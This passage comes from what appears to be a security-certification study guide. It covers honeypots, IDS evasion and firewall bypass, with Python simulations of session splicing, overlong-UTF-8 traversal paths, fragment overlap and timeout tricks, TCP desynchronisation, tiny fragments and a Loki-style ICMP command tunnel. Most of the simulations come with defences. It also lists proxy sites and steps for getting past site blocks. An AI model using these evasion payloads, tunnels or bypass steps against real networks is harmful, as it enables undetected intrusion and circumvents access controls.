to attract and log potential hackers by simulating vulnerable system services and Trojans. It has
highly configurable features of detailed logging, analysis of attack, and security alerts. When
using the KFSensor, a user can create different types of scenarios, such as what action should be
taken when access to a honeypot is attempted. KFSensor contains many innovative and unique
features, such as remote management, a Snort compatible signature engine, and emulations of
real servers (e.g. FTP, POP3, HTTP, Telnet and SMTP) to deceive the hacker and gain more
valuable information about his motives. The following are features of KFSensor:
- GUI based management console
- Remote management
- Snort compatible signature engine
- Emulations of Windows networking protocols
- Export logs in multiple formats
- Denial of Service attack protection
Specter
Specter is a commercial honeypot-based intrusion detection system. Specter is developed and sold by the Swiss company Netsec. It is used to lure hackers away from the production machines by simulating a vulnerable computer as an interesting target. It offers common Internet services such as SMTP, FTP, POP3, HTTP, and TELNET. These services appear perfectly normal to the attackers; however, in reality, these services are traps for the attackers to mess around in and leave traces, without even knowing that they are connected to a decoy system.
A Specter system consists of a dedicated PC and the Specter software that is connected to the
network where attacks are expected to occur. It can also be installed on internal networks to find
suspicious activities within an organization. It is designed for commercial organizations,
including small and large enterprises.
16.4 Examine evading IDS, understand evading firewalls, and learn detecting honeypots
Exam Focus: Examine evading IDS, understand evading firewalls, and learn detecting honeypots. Objective includes:
- Examine evading IDS.
- Understand evading firewalls.
- Learn detecting honeypots.
Evasion attack
An evasion attack is one in which an IDS rejects a malicious packet but the host computer
accepts it. Since the IDS has rejected it, it does not check the contents of the packet. Hence,
using this technique, an attacker can exploit the host computer. In many cases, it is quite simple
for an attacker to send such data packets that can easily perform evasion attacks on IDSs. The
attacker sends portions of the request in packets that are mistakenly rejected by the IDS. This
allows the removal of parts of the stream from the ID system's view. For example, the IDS
cannot detect the attack if the malicious sequence is sent byte-by-byte and one byte is rejected by
the IDS.
Denial of Service attack
Central logging servers are employed by many IDSs. Central logging servers are used
exclusively for storing IDS alert logs. The central server is used to centralize alert data; hence, it
can be viewed as a whole rather than on a system-by-system basis. Attackers can slow the central
server down or even crash it using a DoS attack if they know the central log server's IP address.
Attacks can go unnoticed after the server is shut down as the alert data is no longer being used.
An attacker can do the following using this evasion technique:
- Cause the device to lock up.
- Cause personnel to be unable to investigate all the alarms.
- Consume the device's processing power and permit attacks to sneak by.
- Fill up disk space, causing attacks to not be logged.
- Cause more alarms than management systems can handle.
Obfuscating
An IDS can be evaded by obfuscating or encoding the attack payload in a way that the target
computer will reverse but the IDS will not. In the past, an adversary using the Unicode character
could encode attack packets that an IDS would not recognize but that an IIS Web server would
decode and become attacked. Polymorphic code is another means to circumvent signature-based
IDSs by creating unique attack patterns, so that the attack does not have a single detectable
signature. Attacks on encrypted protocols such as HTTPS are obfuscated if the attack is
encrypted.
Session splicing IDS evasion technique
In the session splicing IDS evasion technique, an attacker delivers data in multiple small sized
packets. Hence, it becomes very difficult for an IDS to detect the attack signatures of such
attacks. For example, consider the following snort signature for detecting session splicing:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC whisker splice attack"; content:"|20|"; flags:A+; dsize:1; reference:arachnids,296; classtype:attempted-recon; sid:1104; rev:1;)
This rule detects traffic destined to port 80 with the ack flag set, a space (hex 20) in the payload,
and a dsize of 1. Although this signature accurately detects session splicing, this method can be
modified to evade the IDS. To evade this rule, an attacker can send abnormally small packets.
For example, an attacker can send very small sized packets with durations of 15 minutes per
packet to the IIS Web server. Since an IIS session remains alive for a long time, the IDS may be
tricked into accepting them as regular packet transformations.
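The rule above fires on a symptom (one-byte segments to port 80); the more robust defence is to stop matching per packet and match on the reassembled TCP stream. The following is an added example, not Snort's code: a constructed capture holds one HTTP request delivered one byte per segment alongside an ordinary request, and three checks run over it: per-segment signature matching (which sees nothing), matching on each flow after reassembly in sequence order (which finds the request), and a count of tiny segments per flow, the statistic the quoted rule keys on. The signatures and the capture are constructed.

```python
from collections import defaultdict

# Constructed signatures an IDS might carry for a web server.
SIGNATURES = [b"/cgi-bin/phf", b"../../"]

# Constructed capture of (flow id, TCP sequence offset, payload). Flow A is a
# request delivered one byte per segment; flow B is an ordinary request.
SPLICED_REQUEST = b"GET /cgi-bin/phf HTTP/1.0\r\n\r\n"
CAPTURE = [("flowA", i, bytes([b])) for i, b in enumerate(SPLICED_REQUEST)]
CAPTURE.append(("flowB", 0, b"GET /index.html HTTP/1.0\r\n\r\n"))


def per_packet_matches(capture):
    """Naive IDS: test every signature against each segment on its own."""
    return [(flow, seq) for flow, seq, data in capture
            if any(sig in data for sig in SIGNATURES)]


def reassemble(capture):
    """Rebuild each flow's byte stream from its segments in sequence order."""
    segments = defaultdict(dict)
    for flow, seq, data in capture:
        segments[flow][seq] = data
    streams = {}
    for flow, segs in segments.items():
        stream = bytearray()
        for seq in sorted(segs):
            data = segs[seq]
            if seq > len(stream):  # hole: a segment has not arrived (yet)
                stream.extend(b"\x00" * (seq - len(stream)))
            stream[seq:seq + len(data)] = data
        streams[flow] = bytes(stream)
    return streams


def stream_matches(capture):
    """Stream-aware IDS: match signatures against the reassembled flows."""
    return [(flow, sig) for flow, stream in reassemble(capture).items()
            for sig in SIGNATURES if sig in stream]


def tiny_segment_counts(capture, max_size=1):
    """Segments of at most max_size bytes per flow: the statistic the quoted
    rule (dsize:1 on port 80) keys on; a real client produces almost none."""
    counts = {flow: 0 for flow, _, _ in capture}
    for flow, _, data in capture:
        if len(data) <= max_size:
            counts[flow] += 1
    return counts


if __name__ == "__main__":
    print("per-packet :", per_packet_matches(CAPTURE))
    print("stream     :", stream_matches(CAPTURE))
    print("tiny segs  :", tiny_segment_counts(CAPTURE))
```

Reassembly is what makes the 15-minutes-per-packet variant described above costly for the attacker rather than for the IDS: as long as the reassembler keeps the flow's state for as long as the web server keeps the session, the signature is matched once against the whole request, no matter how the bytes were split.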
Fragmentation overlap IDS evasion method
In this approach, the attacker sends IP fragments whose offsets overlap, so that part of one
fragment covers data already delivered in a previous fragment. Stacks resolve such overlaps
differently (some keep the bytes that arrived first, others let the later fragment win), and the
attacker arranges the fragments so that the victim's reassembly policy produces the attack string
while the IDS's policy produces harmless data. An IDS that does not reassemble fragments exactly
as the target host does therefore never sees the attack.
Fragmentation overwrite IDS evasion method
This is the variant in which a later fragment completely covers the data of an earlier one. The
attacker first sends a fragment carrying innocuous bytes, then a fragment at the same offset
carrying the attack bytes. A host that lets the later fragment overwrite the earlier one
reassembles and executes the attack string; an IDS that keeps the first copy, or that has already
flushed its reassembly state, sees only the decoy.
Unicode evasion technique
Unicode assigns every character of every written language a unique code point, which gives
computers a uniform way to represent text. The problem for an IDS lies in the encodings of those
code points: UTF-8 has one canonical byte sequence per character, but lenient decoders also
accept "overlong" forms. The backslash, for example, is canonically the single byte 5C, yet the
two-byte sequence C1 9C and the three-byte sequence E0 81 9C decode to the same character on a
tolerant decoder (this was the root of the IIS Unicode directory-traversal bug). A signature
written for the canonical bytes misses the other forms, which makes exact pattern matching very
difficult unless the IDS normalizes the encoding the same way the target does.
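The three encodings of the backslash mentioned above, generated rather than typed, and the difference between a strict and a tolerant decoder, as an added example (not from the page; the request paths are constructed, and decode_lenient is a simplified model of a tolerant decoder, not IIS's code):

```python
"""Unicode evasion via overlong UTF-8. One character, several byte
sequences: a strict decoder rejects the overlong forms, a lenient decoder
accepts them, and a signature written for the canonical bytes misses the
rest. Added example; the inputs are constructed and decode_lenient is a
simplified model of a tolerant decoder, not IIS's code."""
from urllib.parse import unquote_to_bytes


def encode_overlong(codepoint, nbytes):
    """UTF-8-encode codepoint in exactly nbytes bytes, even when a shorter
    (canonical) form exists; nbytes above the minimum gives an overlong form."""
    if nbytes == 1:
        if codepoint > 0x7F:
            raise ValueError("does not fit in one byte")
        return bytes([codepoint])
    lead_prefix = {2: 0xC0, 3: 0xE0, 4: 0xF0}[nbytes]
    if codepoint >> (6 * (nbytes - 1) + (7 - nbytes)):
        raise ValueError("does not fit")
    out = [lead_prefix | (codepoint >> (6 * (nbytes - 1)))]
    for i in range(nbytes - 2, -1, -1):
        out.append(0x80 | ((codepoint >> (6 * i)) & 0x3F))
    return bytes(out)


def decode_lenient(data):
    """Decode UTF-8 but accept overlong sequences (tolerant decoder)."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            n, cp = 1, b
        elif 0xC0 <= b < 0xE0:
            n, cp = 2, b & 0x1F
        elif 0xE0 <= b < 0xF0:
            n, cp = 3, b & 0x0F
        elif 0xF0 <= b < 0xF8:
            n, cp = 4, b & 0x07
        else:
            raise ValueError("bad lead byte at %d" % i)
        for j in range(1, n):
            if i + j >= len(data) or (data[i + j] & 0xC0) != 0x80:
                raise ValueError("bad continuation at %d" % (i + j))
            cp = (cp << 6) | (data[i + j] & 0x3F)
        out.append(chr(cp))
        i += n
    return "".join(out)


def decode_strict(data):
    """Python's decoder rejects overlong forms; None means 'rejected'."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def percent(raw):
    """Percent-encode every byte, as an attacker would put it in a URL."""
    return b"".join(b"%%%02x" % x for x in raw)


def naive_signature(path):
    """IDS that percent-decodes and then looks for the canonical '..\\'."""
    return b"..\\" in unquote_to_bytes(path)


def check_request(path, decoder):
    """Percent-decode, then character-decode as the server would, and report
    whether '..\\' is present. None: the decoder rejected the bytes."""
    text = decoder(unquote_to_bytes(path))
    return None if text is None else ("..\\" in text)


def traversal_variants():
    """Constructed request paths: the same '..\\..\\' with the backslash in
    its canonical, two-byte overlong and three-byte overlong encodings."""
    forms = {}
    for name, raw in (("canonical", b"\\"),
                      ("overlong2", encode_overlong(0x5C, 2)),
                      ("overlong3", encode_overlong(0x5C, 3))):
        forms[name] = b"/.." + percent(raw) + b".." + percent(raw) + b"winnt/cmd"
    return forms
```

The practical fix on the IDS side is to decode the way the target does before matching (Snort's http_inspect has per-server profiles for exactly this); on the server side, reject overlong sequences outright, as every modern UTF-8 decoder does.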
Fragmentation attack
This attack exploits a fragment reassembly timeout on the IDS that is shorter than the victim's.
Suppose the IDS discards incomplete fragment sets after 15 seconds while the monitored hosts are
Linux systems, whose default fragment reassembly timeout is 30 seconds. The attacker sends the
first fragment, waits more than 15 seconds but less than 30, and then sends the second fragment.
The victim still holds the first fragment, so it reassembles the datagram and is attacked. The
IDS, by contrast, has already timed out and discarded the first fragment, so the second one
arrives as an orphan and is dropped. The victim is compromised and the IDS raises no alert.
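A small reassembler that exposes both ambiguities the three fragmentation sections above rely on, overlap/overwrite policy and reassembly timeout, as an added example (not from the page; the fragments are constructed, and "first" and "last" are simplified policies, not models of any particular kernel):

```python
"""IP fragment reassembly ambiguities the overlap, overwrite and timeout
evasions rely on. Added example over constructed fragments; 'first' and
'last' are simplified overlap policies, not models of particular kernels
(real stacks mix them, and Snort's frag3 lets you pick a policy per target)."""


def reassemble(fragments, policy="first", timeout=None):
    """fragments: list of (arrival_time, byte_offset, data) for one
    datagram. Returns the reassembled payload, or None if a fragment
    arrived more than `timeout` seconds after the first one (the
    reassembler has given up and discarded its partial state).
    policy 'first': bytes already received win over later overlapping
    bytes; 'last': a later fragment overwrites what an earlier one put
    there."""
    buf = {}
    t0 = fragments[0][0]
    for t, off, data in fragments:
        if timeout is not None and t - t0 > timeout:
            return None
        for i, b in enumerate(data):
            if policy == "first" and (off + i) in buf:
                continue
            buf[off + i] = b
    return bytes(buf.get(i, 0) for i in range(max(buf) + 1)) if buf else b""


def compare(fragments, ids, host):
    """ids / host: dicts with 'policy' and 'timeout'. Returns what each side
    reassembles and whether the IDS would see the same bytes as the host."""
    ids_view = reassemble(fragments, **ids)
    host_view = reassemble(fragments, **host)
    return {"ids": ids_view, "host": host_view, "agree": ids_view == host_view}


# Overlap/overwrite: fragment 2 starts inside fragment 1 (offset 4 of a
# 7-byte first fragment). Under 'first' bytes 4-6 stay "/in"; under 'last'
# they become "/cg" and the requested path changes completely.
OVERLAP = [(0.0, 0, b"GET /in"), (0.1, 4, b"/cgi-bin/x.sh")]

# Timeout: the second fragment arrives 20 s after the first. An IDS that
# discards partial datagrams after 15 s loses it; a host allowing 30 s
# (the Linux default ipfrag_time) still reassembles.
SLOW = [(0.0, 0, b"GET /cgi"), (20.0, 8, b"-bin/x.sh")]


def overlap_demo():
    return compare(OVERLAP, ids={"policy": "first", "timeout": None},
                   host={"policy": "last", "timeout": None})


def timeout_demo():
    return compare(SLOW, ids={"policy": "first", "timeout": 15},
                   host={"policy": "first", "timeout": 30})


if __name__ == "__main__":
    print(overlap_demo())
    print(timeout_demo())
```

Either mismatch is enough: the IDS inspects a datagram the host never assembled, or no datagram at all, while the host executes the one the attacker intended. The countermeasure is target-based reassembly (the sensor configured with each protected host's policy and timeout) or a normalizer in front of both.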
IP address spoofing
The attacker can use IP address spoofing to gain unauthorized access to a computer or network.
The attacker forges the source address field in the IP header so that the packets appear to come
from a trusted machine; nothing in IPv4 authenticates that field, so a filter that trusts source
addresses alone can be bypassed.
Suppose there are three hosts, HostA, HostB, and HostC, and HostB trusts HostC. HostA wants to
send packets to HostB, so it writes HostC's address into the source field of those packets. HostB
believes the packets were sent by HostC, but in reality they came from HostA. Replies go to HostC
rather than to the attacker, so spoofing is most useful for one-way attacks and for protocols
whose replies the attacker does not need to see or can predict.
Time-to-live attacks
A time-to-live (TTL) attack requires prior knowledge of the victim's network topology, in
particular that a router sits between the IDS and the victim. Tools such as traceroute reveal the
number of routers between the attacker and the victim. The attacker splits the attack into three
fragments and proceeds as follows:
1. Fragment 1 is sent with a large TTL. Both the IDS and the victim receive it.
2. A decoy fragment 2' with a false payload is sent with a TTL of 1. The IDS receives it, but
the router between the IDS and the victim decrements the TTL to zero and discards it, so the
victim never sees it.
3. Fragment 3 is sent with a valid TTL. The IDS now holds (1, 2', 3), reassembles a harmless
datagram, finds no attack, and flushes its reassembly state. The victim holds only (1, 3) and
keeps waiting for fragment 2.
4. Finally the real fragment 2 is sent with a valid TTL. The victim reassembles (1, 2, 3) and
receives the attack. The IDS, having already flushed, sees a lone fragment it cannot place and
alerts on nothing.
Invalid RST packets
TCP protects each segment with a checksum: the sender computes it over the segment and a
pseudo-header, and the receiver recomputes it and silently drops any segment that does not match.
TCP also uses the RST flag to abort a connection. An attacker can exploit the difference between
an IDS and an end host by sending an RST segment with a deliberately invalid checksum. An IDS
that does not verify TCP checksums interprets the RST as the end of the session and stops
reassembling the stream, while the end host verifies the checksum, discards the segment, and keeps
the connection open. Anything the attacker sends after that point reaches the host but is no
longer inspected.
Urgency flag
TCP's URG flag marks part of a segment as urgent data, and the urgent pointer field gives the
offset, from the segment's sequence number, of the end of that data. Operating systems disagree on
what to do with urgent data: many stacks, including BSD-derived ones, hand the urgent byte to the
application out of band and remove it from the normal in-line stream, while others leave it in
place. In the common case, when the URG flag is set:
- the byte the urgent pointer designates is delivered out of band and does not appear in the
stream the application reads;
- the bytes before and after it are delivered normally.
An attacker can exploit this by placing bytes in the urgent position that the host's stack will
strip. An IDS that ignores the URG flag keeps those bytes in its reconstructed stream, so the IDS
and the end host see different data, and a signature that matches one will not match the other.
Evasion is possible whenever the IDS does not model the target's handling of urgent data.
ASCII shellcode
ASCII shellcode consists only of bytes that are printable ASCII characters. It lets attackers get
past input filters that reject non-printable characters, and it also defeats IDS pattern-matching
signatures, because the strings an analyst would key on are not present in their usual form, much
as with polymorphic shellcode. Not every assembly instruction can be encoded with printable
bytes, so writing shellcode this way limits what it can do directly; attackers work around that
by using the instructions (or combinations of instructions) that do fall in the printable range
to build the non-printable code in memory at run time and then jump to it.
Application-layer attack
Many applications that handle media such as images, video, and audio compress their data to make
it much smaller than the original and faster to transfer. When such an application has a flaw,
the entire attack can be carried inside the compressed data, and an IDS that does not decompress
the format has no way to match signatures against it. A related problem is that many IDS
signatures look for one particular trigger condition, whereas the attack can take many forms: an
integer overflow, for example, can be triggered by many different integer values, and a signature
for one of them misses the rest.
Desynchronization - pre connection SYN
In the pre-connection SYN attack, the attacker first calls bind so that the kernel assigns a local
port to the socket and then, before calling connect, sends a forged SYN from that port with an
invalid TCP checksum. The real connection follows. If the sniffer or IDS does not verify TCP
checksums and ignores any later SYN on a connection it already tracks, it synchronizes to the
bogus sequence number of the fake SYN; the end host discards the fake SYN because of the bad
checksum and uses the real one, so the IDS's view of the stream no longer matches the host's.
Desynchronization - post connection SYN
In the post-connection SYN attack, the goal is again to desynchronize the IDS from the sequence
numbers the target's kernel is actually honoring. The attacker sends a SYN inside an established
connection: it carries divergent sequence numbers but otherwise meets every criterion the target
would check. Because the SYN refers to a connection that is already established, the target host
ignores it.
The aim is to get the IDS to resynchronize its notion of the sequence numbers to the new SYN.
Having done so, it expects a different sequence number and ignores the data that is a legitimate
part of the original stream. Once the IDS has been resynchronized with the SYN, the attacker can
send an RST carrying the new sequence number to make the IDS close down its notion of the
connection entirely.
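The invalid-RST and both SYN desynchronization attacks above, played against a host-like tracker that verifies checksums and a configurable IDS-like tracker, as an added example (not from the page; the addresses, ports and request are constructed, segments are built in memory, and the trackers are reduced to the two choices that matter here):

```python
"""TCP stream desynchronisation of an IDS: an RST with a bad checksum
closes the IDS's view of a session the host keeps open, and a SYN injected
into an established connection (or a bad-checksum SYN sent before the real
one) makes an IDS that honours it expect the wrong sequence numbers.
Added example; segments are built in memory and fed to two toy trackers,
nothing is sent on the wire, and the addresses and ports are constructed."""
import socket
import struct

SYN, RST, ACK = 0x02, 0x04, 0x10


def ones_complement_sum(data):
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def pseudo_header(src, dst, tcp_len):
    return socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, tcp_len)


def build_segment(src, dst, sport, dport, seq, flags, payload=b"", bad_checksum=False):
    """Raw TCP header + payload. bad_checksum=True makes the segment
    syntactically fine but guarantees it fails verification."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 65535, 0, 0)
    csum = ones_complement_sum(pseudo_header(src, dst, 20 + len(payload)) + hdr + payload)
    if bad_checksum:
        csum = (csum + 1) & 0xFFFF
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def parse_segment(src, dst, raw):
    sport, dport, seq, ack, off, flags, win, csum, urg = struct.unpack("!HHIIBBHHH", raw[:20])
    ok = ones_complement_sum(pseudo_header(src, dst, len(raw)) + raw) == 0
    return {"seq": seq, "flags": flags, "payload": raw[(off >> 4) * 4:], "checksum_ok": ok}


class StreamTracker:
    """One direction of a TCP stream, reduced to the two choices that
    matter here. verify_checksum: drop segments that fail the checksum
    (hosts always do). resync_on_syn: adopt the sequence number of a SYN
    seen after the stream is already established (a host ignores it).
    Only in-order data is accepted; out-of-order segments are dropped."""

    def __init__(self, verify_checksum, resync_on_syn):
        self.verify, self.resync = verify_checksum, resync_on_syn
        self.next_seq, self.data, self.closed = None, b"", False

    def feed(self, seg):
        if self.closed or (self.verify and not seg["checksum_ok"]):
            return
        if seg["flags"] & SYN:
            if self.next_seq is None or self.resync:
                self.next_seq = seg["seq"] + 1     # first data byte is ISN + 1
            return
        if seg["flags"] & RST:
            self.closed = True
            return
        if seg["seq"] == self.next_seq and seg["payload"]:
            self.data += seg["payload"]
            self.next_seq += len(seg["payload"])


def run(segments, ids_verify, ids_resync):
    """Feed the same segments to a host-like and an IDS-like tracker."""
    host, ids = StreamTracker(True, False), StreamTracker(ids_verify, ids_resync)
    for s in segments:
        host.feed(s)
        ids.feed(s)
    return {"host": host.data, "ids": ids.data}


SRC, DST = "10.0.0.5", "10.0.0.9"          # constructed addresses


def seg(seq, flags, payload=b"", bad=False):
    return parse_segment(SRC, DST, build_segment(SRC, DST, 40000, 80, seq, flags, payload, bad))


def invalid_rst_demo():
    """RST with a bad checksum: host drops it, IDS without checksum checks closes."""
    return run([seg(1000, SYN), seg(1001, ACK, b"GET /cgi-bin/"),
                seg(1014, RST | ACK, bad=True), seg(1014, ACK, b"x.sh HTTP/1.0\r\n")],
               ids_verify=False, ids_resync=False)


def post_connection_syn_demo():
    """SYN inside an established stream: host ignores it, IDS resyncs to it."""
    return run([seg(1000, SYN), seg(1001, ACK, b"GET /cgi-bin/"),
                seg(5000, SYN), seg(1014, ACK, b"x.sh HTTP/1.0\r\n")],
               ids_verify=True, ids_resync=True)


def pre_connection_syn_demo():
    """Bad-checksum SYN before the real one: IDS syncs to a bogus ISN."""
    return run([seg(7777, SYN, bad=True), seg(1000, SYN), seg(1001, ACK, b"GET /cgi-bin/")],
               ids_verify=False, ids_resync=False)
```

In each case the host's view is the full request and the IDS's view is truncated or empty. The two settings that close these holes are the ones the trackers expose: verify TCP checksums before acting on a segment, and never accept a SYN for a session already in ESTABLISHED state.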
Encryption
The most effective evasion occurs when the attacker has already established an encrypted session
with the victim: a network IDS then sees only ciphertext and can match nothing in the payload.
Flooding
If the attacker sends large volumes of unnecessary traffic to produce noise, the true attack
traffic may go undetected, either because the IDS drops packets under load or because the real
alerts are buried among the false ones.
Session token generation
The technique described here is IP source routing. Normally each router looks at a packet's
destination address and chooses the next hop itself. With a source-route option in the IP header,
the sender partially (loose source routing) or completely (strict source routing) specifies the
route the packet takes through the network. An attacker can use this to steer packets around a
firewall or an IDS sensor, or to get replies back to a spoofed source address. Most modern
routers and hosts drop source-routed packets by default, and a firewall should do the same.
Tiny fragment
The tiny fragment attack sends an IP datagram whose first fragment is so small that it carries
only the TCP source and destination ports (the first 8 bytes of the TCP header) and not the TCP
flags, which land in the second fragment. An access list that permits or denies packets on the
basis of TCP flags cannot test the first fragment for them.
Because most network devices do not reassemble datagrams that pass through them, they do not
inspect the remaining fragments either and let them through. In this way an attacker can get an
illegitimate packet past such a device to an end host. RFC 1858 describes the fix: drop TCP first
fragments too short to contain the flags, and drop any fragment with offset 1, which could
overwrite them.
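One header builder serves both the spoofing section and the tiny-fragment section above, together with the filter checks a practitioner would add: RFC 2827 ingress filtering for spoofed sources and the RFC 1858 checks for tiny fragments. This is an added example, not from the page; packets are built in memory only, and the addresses and ports are constructed.

```python
"""IPv4 header construction, and the checks that catch the two attacks:
the source address is an unauthenticated header field (spoofing, countered
by RFC 2827 ingress filtering) and a fragmented TCP segment can push the
flags out of the first fragment (tiny fragment, countered by the RFC 1858
checks). Added example; packets are built in memory only and the
addresses are constructed."""
import ipaddress
import struct

IPPROTO_TCP = 6
TCP_FLAG_ACK = 0x10


def header_checksum(hdr):
    s = sum(struct.unpack("!10H", hdr[:20]))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def build_ipv4(src, dst, payload, ident=1, offset=0, more_fragments=False, ttl=64, proto=IPPROTO_TCP):
    """Minimal 20-byte header. offset is in 8-byte units, as on the wire.
    Nothing stops the caller writing any address into src: that is spoofing."""
    flags_frag = (0x2000 if more_fragments else 0) | (offset & 0x1FFF)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, flags_frag,
                      ttl, proto, 0, ipaddress.ip_address(src).packed,
                      ipaddress.ip_address(dst).packed)
    return hdr[:10] + struct.pack("!H", header_checksum(hdr)) + hdr[12:] + payload


def parse_ipv4(pkt):
    _, _, total, ident, ff, ttl, proto, _, s, d = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    return {"src": ipaddress.ip_address(s), "dst": ipaddress.ip_address(d), "ident": ident,
            "proto": proto, "ttl": ttl, "offset": ff & 0x1FFF, "mf": bool(ff & 0x2000),
            "checksum_ok": header_checksum(pkt[:20]) == 0, "payload": pkt[20:total]}


def fragment(src, dst, segment, frag_size, ident=7):
    """Split a transport segment into IP fragments of frag_size bytes."""
    assert frag_size % 8 == 0, "fragment offsets are counted in 8-byte units"
    return [build_ipv4(src, dst, segment[i:i + frag_size], ident, i // 8,
                       more_fragments=i + frag_size < len(segment))
            for i in range(0, len(segment), frag_size)]


def tcp_header(sport, dport, flags):
    """20-byte TCP header; the flags byte sits at offset 13, past the ports."""
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, flags, 8192, 0, 0)


def ingress_filter_allows(pkt, inside_prefix):
    """RFC 2827: a packet arriving from outside must not claim an inside source."""
    return parse_ipv4(pkt)["src"] not in ipaddress.ip_network(inside_prefix)


def naive_acl_allows(pkt):
    """Stateless 'established only' ACL: pass if ACK is set. It can only test
    flags it can see, and classic ACLs pass non-first fragments untested."""
    p = parse_ipv4(pkt)
    if p["proto"] != IPPROTO_TCP or p["offset"] != 0:
        return True
    if len(p["payload"]) < 14:
        return True                   # flags byte missing: tiny first fragment slips by
    return bool(p["payload"][13] & TCP_FLAG_ACK)


def rfc1858_allows(pkt, min_first_fragment=16):
    """Direct method: drop a TCP first fragment too short to hold the flags.
    Indirect method: drop any fragment at offset 1, which could overwrite them."""
    p = parse_ipv4(pkt)
    if p["proto"] != IPPROTO_TCP:
        return True
    if p["offset"] == 0 and p["mf"] and len(p["payload"]) < min_first_fragment:
        return False
    return p["offset"] != 1


def tiny_fragment_demo():
    """A SYN (no ACK) split into 8-byte fragments: the naive ACL passes every
    piece, the RFC 1858 checks stop the first two."""
    frags = fragment("203.0.113.5", "192.0.2.10", tcp_header(40000, 22, 0x02), 8)
    return {"count": len(frags),
            "naive": [naive_acl_allows(f) for f in frags],
            "rfc1858": [rfc1858_allows(f) for f in frags]}
```

The same 20-byte SYN sent unfragmented is rejected by the naive ACL, which shows the ACL is not wrong about flags, only blind to fragments; the RFC 1858 checks restore that blindness to a hard failure.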
Bypass blocked sites using the IP address in place of URL
This involves typing the Website's IP address directly into the browser's address bar instead of
the blocked domain name. For example, instead of typing www.facebook.com, type its IP address to
reach Facebook. Host2ip can be used to determine the IP address of the blocked Website. The method
fails if the blocking software also filters on the destination IP address, and on servers that
host several sites behind one address (name-based virtual hosting) the bare IP address may not
serve the intended site.
Bypass blocked sites using anonymous Website surfing sites
Many Websites let a user surf the Internet anonymously, and some also offer to encrypt the URLs of
the sites visited. The filter sees only a connection to the proxy Website, which presents its own
IP address and hides the address of the real destination. Many proxy sites maintain lists of
currently active proxy sites that let users browse the Web anonymously. This gets around a block
on the destination site, as long as the proxy site itself is not blocked.
Proxy servers useful in unblocking the blocked Websites
The following are some proxy servers that are useful in unblocking blocked Websites:
- http://www.anonymizer.com
- http://anonymouse.com
- http://proxify.com
- http://bumsk.com
- http://dailybestlinks.com
- http://www.spysurfing.com
- http://alienproxy.com
- http://indianproxy.com
Bypass a firewall using a proxy server
The following steps should be taken to bypass a firewall using a proxy server:
1. Find an appropriate proxy server.
2. Open the browser's proxy settings (in Internet Explorer: Tools > Internet Options >
Connections tab > LAN settings; other browsers have an equivalent dialog).
3. Select "Use a proxy server for your LAN" under Proxy server.
4. Type the IP address of the proxy server in the Address box.
5. In the Port box, type the port number the proxy server uses for client connections.
6. Select the "Bypass proxy server for local addresses" checkbox if the proxy should not be
used for hosts on the local network.
7. Click OK to close the LAN settings dialog box.
8. Click OK to close the Internet Options dialog box.
Bypassing a firewall through the ICMP tunneling method
ICMP tunneling carries a backdoor shell in the data portion of ICMP echo packets. RFC 792 defines
ICMP but does not specify what the data portion of an echo request or reply must contain; the
payload is arbitrary, and most firewalls do not examine it. Any data, including the commands and
output of a backdoor application, can therefore be placed in the payload of an ICMP packet.
Administrators often keep ICMP echo open on firewalls because tools such as ping and traceroute
depend on it. Loki is the classic ICMP tunneling tool: assuming ICMP is allowed through the
firewall, it executes commands of the attacker's choice by carrying them inside the payload of
ICMP echo packets. The usual countermeasures are to block or rate-limit echo traffic at the
perimeter, or to inspect echo payloads for anything that does not look like a standard ping.
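Both ends of a Loki-style tunnel and the payload check a perimeter device can apply, as an added example (not Loki's code and not from the page; both ends run in memory, the "server" looks commands up in a table instead of executing them, the MAGIC tag and the command table are constructed, and the reference payloads are those of iputils and Windows ping):

```python
"""Loki-style ICMP tunnel: a command rides in the data field of an echo
request and its output comes back in the echo reply, plus a payload check
a firewall or IDS can apply. Added example; both ends run in memory (the
'server' looks commands up in a table instead of executing them), the
MAGIC tag is constructed, and the reference ping payloads are those of
iputils and Windows ping."""
import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8
MAGIC = b"TUN1"                      # constructed tag marking tunnel traffic
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(data):
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def build_echo(icmp_type, ident, seq, data):
    """ICMP echo request/reply: 8-byte header followed by arbitrary data."""
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(hdr + data)
    return hdr[:2] + struct.pack("!H", csum) + hdr[4:] + data


def parse_echo(pkt):
    t, code, _, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    return {"type": t, "code": code, "ident": ident, "seq": seq, "data": pkt[8:],
            "checksum_ok": icmp_checksum(pkt) == 0}


def tunnel_request(command, ident=0x4C4B, seq=1):
    """Client side: wrap a command in what looks like an ordinary ping."""
    return build_echo(ECHO_REQUEST, ident, seq, MAGIC + command)


def tunnel_server(pkt, handlers):
    """Backdoor side: answer only echo requests carrying MAGIC; real pings are
    left alone so the host keeps answering them normally. handlers maps a
    command to its (constructed) output; a real backdoor would execute it."""
    p = parse_echo(pkt)
    if p["type"] != ECHO_REQUEST or not p["checksum_ok"] or not p["data"].startswith(MAGIC):
        return None
    output = handlers.get(p["data"][len(MAGIC):], b"unknown command")
    return build_echo(ECHO_REPLY, p["ident"], p["seq"], MAGIC + output)


def tunnel_client_read(reply):
    p = parse_echo(reply)
    if p["type"] != ECHO_REPLY or not p["data"].startswith(MAGIC):
        return None
    return p["data"][len(MAGIC):]


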